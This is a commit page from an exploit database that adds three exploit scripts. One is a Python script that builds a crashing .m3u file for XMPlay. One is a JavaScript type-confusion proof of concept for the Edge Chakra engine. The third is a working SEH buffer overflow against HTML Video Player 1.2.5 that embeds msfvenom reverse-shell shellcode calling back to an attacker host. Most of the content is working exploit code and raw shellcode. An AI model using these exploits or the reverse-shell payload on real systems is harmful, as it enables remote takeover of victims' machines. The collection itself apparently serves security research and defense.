DB: 2018-11-20
3 changes to exploits/shellcodes XMPlay 3.8.3 - '.m3u' Denial of Service (PoC) Microsoft Edge Chakra - OP_Memset Type Confusion HTML Video Player 1.2.5 - Buffer-Overflow (SEH)
This commit is contained in:
Offensive Security
parent
9496a4320a
commit
dcc75fdf49
4 changed files with 171 additions and 0 deletions
44
exploits/windows/dos/45887.py
Executable file
44
exploits/windows/dos/45887.py
Executable file
|
|
@ -0,0 +1,44 @@
|
|||
# Exploit Title: XMPlay 3.8.3 - '.m3u' Denial of Service (PoC)
|
||||
# Date: 2018-11-18
|
||||
# Exploit Author: s7acktrac3
|
||||
# Vendor Homepage: https://www.xmplay.com/
|
||||
# Software Link: https://support.xmplay.com/files_view.php?file_id=676
|
||||
# Version: 3.8.3 (latest)
|
||||
# Tested on: Windows XP/7/8
|
||||
# CVE : N/A
|
||||
#
|
||||
# Lauch XMPlay and either drag xmplay.m3u into the XMPlay window or
|
||||
# File Menu-> select winamp.m3u and Crash!
|
||||
# -*- coding: utf-8 -*-
|
||||
#
|
||||
# Note: Successfully can overwrite the SEH chain & control the handler and nSEH
|
||||
# but the address get mangled & unreconizable, for this reason could not turn into
|
||||
# code execution.
|
||||
|
||||
import struct
|
||||
from struct import pack
|
||||
|
||||
file_data = "#EXTM3U\n\r"
|
||||
file_data += "#EXTINF:200,Sleep Away\n\r"
|
||||
file_data += "http://test."
|
||||
|
||||
max_size = 3000 - 1
|
||||
nseh_offset = 656
|
||||
|
||||
seh_overwrite = pack("<L", 0x00402450)
|
||||
|
||||
payload = "A" * nseh_offset # padding for nseh
|
||||
payload += "BBBB" # nseh
|
||||
payload += seh_overwrite # seh
|
||||
|
||||
#padding for rest of payload - pipe "|" is needed somehow to force crash
|
||||
payload += "D" *(max_size - len(payload)) + "|"
|
||||
print "[+] Creating .m3u file with payload size: "+ str(len(payload))
|
||||
|
||||
exploit = file_data + payload
|
||||
|
||||
file = open('xmplay.m3u','w');
|
||||
file.write(exploit);
|
||||
file.close();
|
||||
|
||||
print "[+] Done creating the file"
|
||||
45
exploits/windows/dos/45889.js
Normal file
45
exploits/windows/dos/45889.js
Normal file
|
|
@ -0,0 +1,45 @@
|
|||
/*
|
||||
Since the patch for CVE-2018-8372, it checks all inputs to native arrays, and if any input equals to the MissingItem value which can cause type confusion, it starts the bailout process. But it doesn't check the "value" argument to OP_Memset. This can be exploited in the same way as for issue 1581 .
|
||||
|
||||
PoC:
|
||||
*/
|
||||
|
||||
function memset(arr, value, n) {
|
||||
for (let i = 0; i < n; i++) {
|
||||
arr[i] = value;
|
||||
}
|
||||
}
|
||||
|
||||
function trigger(arr, buggy) {
|
||||
let tmp = [1];
|
||||
|
||||
arr.length;
|
||||
|
||||
let res = tmp.concat(buggy);
|
||||
arr[0] = 0x1234;
|
||||
arr[1] = 0;
|
||||
}
|
||||
|
||||
function main() {
|
||||
let tmp = (new Array(100)).fill(1);
|
||||
for (let i = 0; i < 500; i++) {
|
||||
memset(tmp, 1, tmp.length);
|
||||
trigger(tmp, [1]);
|
||||
}
|
||||
|
||||
setTimeout(() => {
|
||||
let buggy = [1];
|
||||
let arr = [1, 2];
|
||||
|
||||
arr.getPrototypeOf = Object.prototype.valueOf;
|
||||
|
||||
buggy.__proto__ = new Proxy({}, arr);
|
||||
|
||||
memset(buggy, -524286, 1);
|
||||
trigger(arr, buggy);
|
||||
|
||||
alert(arr);
|
||||
}, 100);
|
||||
}
|
||||
|
||||
main();
|
||||
79
exploits/windows_x86/local/45888.py
Executable file
79
exploits/windows_x86/local/45888.py
Executable file
|
|
@ -0,0 +1,79 @@
|
|||
# Exploit Title: HTML Video Player 1.2.5 - Buffer-Overflow (SEH)
|
||||
# Author: Kağan Çapar
|
||||
# Discovery Date: 2018-11-16
|
||||
# Software Link: http://www.html5videoplayer.net/html5videoplayer-setup.exe
|
||||
# Vendor Homepage : http://www.html5videoplayer.net
|
||||
# Tested Version: 1.2.5
|
||||
# Tested on OS: Windows XP SP3 *ENG
|
||||
# Steps to Reproduce: Run the python exploit script, it will create a new
|
||||
# file with the name "exploit.txt" and copy content to clipboard
|
||||
# Open software, click Help > Register and paste "Username" click "OK"
|
||||
# Finally, Connect victim machine on port your localport "1907"
|
||||
|
||||
#!/usr/bin/python
|
||||
import struct
|
||||
|
||||
#SEH chain of main thread, item 0
|
||||
#Address=0012EAF4
|
||||
#SE handler=41414141
|
||||
#=> next_handler below!
|
||||
#SEH chain of main thread, item 0
|
||||
#Address=0012EAF4
|
||||
#SE handler=336F4332 =>
|
||||
|
||||
#7C901931 5E POP ESI
|
||||
#7C901932 5B POP EBX
|
||||
#7C901933 C3 RETN
|
||||
|
||||
#Executable modules, item 14
|
||||
#Base=7C900000
|
||||
#Size=000B2000 (729088.)
|
||||
#Entry=7C912AFC ntdll.<ModuleEntryPoint>
|
||||
#Name=ntdll (system)
|
||||
#File version=5.1.2600.6055 (xpsp_sp3_qfe.101
|
||||
#Path=C:\WINDOWS\system32\ntdll.dll
|
||||
|
||||
file = open("exploit.txt", "w")
|
||||
buf = "\x43\x57\x44\x4F\x4E\x4B\x4E\x50\x48\x52\x4B\x45\x59\x41\x4b\x53" * 124
|
||||
buf+= "\xEB\x06\x90\x90" #6b jmp code
|
||||
buf+= struct.pack('<I', 0x7C901931)
|
||||
|
||||
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.23 LPORT=1907 EXITFUNC=thread -f py -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x1a"
|
||||
#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
|
||||
#x86/shikata_ga_nai succeeded with size 351 (iteration=0)
|
||||
#x86/shikata_ga_nai chosen with final size 351
|
||||
#Payload size: 351 bytes
|
||||
#Final size of py file: 1684 bytes
|
||||
|
||||
buf += "\xbe\xab\xfd\x5f\x95\xda\xcb\xd9\x74\x24\xf4\x5f\x29"
|
||||
buf += "\xc9\xb1\x52\x83\xef\xfc\x31\x77\x0e\x03\xdc\xf3\xbd"
|
||||
buf += "\x60\xde\xe4\xc0\x8b\x1e\xf5\xa4\x02\xfb\xc4\xe4\x71"
|
||||
buf += "\x88\x77\xd5\xf2\xdc\x7b\x9e\x57\xf4\x08\xd2\x7f\xfb"
|
||||
buf += "\xb9\x59\xa6\x32\x39\xf1\x9a\x55\xb9\x08\xcf\xb5\x80"
|
||||
buf += "\xc2\x02\xb4\xc5\x3f\xee\xe4\x9e\x34\x5d\x18\xaa\x01"
|
||||
buf += "\x5e\x93\xe0\x84\xe6\x40\xb0\xa7\xc7\xd7\xca\xf1\xc7"
|
||||
buf += "\xd6\x1f\x8a\x41\xc0\x7c\xb7\x18\x7b\xb6\x43\x9b\xad"
|
||||
buf += "\x86\xac\x30\x90\x26\x5f\x48\xd5\x81\x80\x3f\x2f\xf2"
|
||||
buf += "\x3d\x38\xf4\x88\x99\xcd\xee\x2b\x69\x75\xca\xca\xbe"
|
||||
buf += "\xe0\x99\xc1\x0b\x66\xc5\xc5\x8a\xab\x7e\xf1\x07\x4a"
|
||||
buf += "\x50\x73\x53\x69\x74\xdf\x07\x10\x2d\x85\xe6\x2d\x2d"
|
||||
buf += "\x66\x56\x88\x26\x8b\x83\xa1\x65\xc4\x60\x88\x95\x14"
|
||||
buf += "\xef\x9b\xe6\x26\xb0\x37\x60\x0b\x39\x9e\x77\x6c\x10"
|
||||
buf += "\x66\xe7\x93\x9b\x97\x2e\x50\xcf\xc7\x58\x71\x70\x8c"
|
||||
buf += "\x98\x7e\xa5\x03\xc8\xd0\x16\xe4\xb8\x90\xc6\x8c\xd2"
|
||||
buf += "\x1e\x38\xac\xdd\xf4\x51\x47\x24\x9f\x9d\x30\x26\x48"
|
||||
buf += "\x76\x43\x26\x71\xf5\xca\xc0\x17\xe9\x9a\x5b\x80\x90"
|
||||
buf += "\x86\x17\x31\x5c\x1d\x52\x71\xd6\x92\xa3\x3c\x1f\xde"
|
||||
buf += "\xb7\xa9\xef\x95\xe5\x7c\xef\x03\x81\xe3\x62\xc8\x51"
|
||||
buf += "\x6d\x9f\x47\x06\x3a\x51\x9e\xc2\xd6\xc8\x08\xf0\x2a"
|
||||
buf += "\x8c\x73\xb0\xf0\x6d\x7d\x39\x74\xc9\x59\x29\x40\xd2"
|
||||
buf += "\xe5\x1d\x1c\x85\xb3\xcb\xda\x7f\x72\xa5\xb4\x2c\xdc"
|
||||
buf += "\x21\x40\x1f\xdf\x37\x4d\x4a\xa9\xd7\xfc\x23\xec\xe8"
|
||||
buf += "\x31\xa4\xf8\x91\x2f\x54\x06\x48\xf4\x74\xe5\x58\x01"
|
||||
buf += "\x1d\xb0\x09\xa8\x40\x43\xe4\xef\x7c\xc0\x0c\x90\x7a"
|
||||
buf += "\xd8\x65\x95\xc7\x5e\x96\xe7\x58\x0b\x98\x54\x58\x1e"
|
||||
buf += "\x90" * (4000 - len(buf))
|
||||
|
||||
print len(buf)
|
||||
file.write(buf)
|
||||
file.close()
|
||||
|
|
@ -6192,6 +6192,8 @@ id,file,description,date,author,type,platform,port
|
|||
45869,exploits/windows_x86-64/dos/45869.py,"Notepad3 1.0.2.350 - Denial of Service (PoC)",2018-11-15,"Ihsan Sencan",dos,windows_x86-64,
|
||||
45884,exploits/windows_x86-64/dos/45884.py,"Mumsoft Easy Software 2.0 - Denial of Service (PoC)",2018-11-16,"Ihsan Sencan",dos,windows_x86-64,
|
||||
45885,exploits/windows_x86-64/dos/45885.txt,"Easy Outlook Express Recovery 2.0 - Denial of Service (PoC)",2018-11-16,"Ihsan Sencan",dos,windows_x86-64,
|
||||
45887,exploits/windows/dos/45887.py,"XMPlay 3.8.3 - '.m3u' Denial of Service (PoC)",2018-11-19,s7acktrac3,dos,windows,
|
||||
45889,exploits/windows/dos/45889.js,"Microsoft Edge Chakra - OP_Memset Type Confusion",2018-11-19,"Google Security Research",dos,windows,
|
||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||
|
|
@ -10110,6 +10112,7 @@ id,file,description,date,author,type,platform,port
|
|||
45866,exploits/multiple/local/45866.html,"Webkit (Safari) - Universal Cross-site Scripting",2017-10-03,"Anton Lopanitsyn",local,multiple,
|
||||
45867,exploits/multiple/local/45867.txt,"Webkit (Chome < 61) - 'MHTML' Universal Cross-site Scripting",2017-10-03,"Anton Lopanitsyn",local,multiple,
|
||||
45886,exploits/linux/local/45886.txt,"Linux - Broken uid/gid Mapping for Nested User Namespaces",2018-11-16,"Google Security Research",local,linux,
|
||||
45888,exploits/windows_x86/local/45888.py,"HTML Video Player 1.2.5 - Buffer-Overflow (SEH)",2018-11-19,"Kağan Çapar",local,windows_x86,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue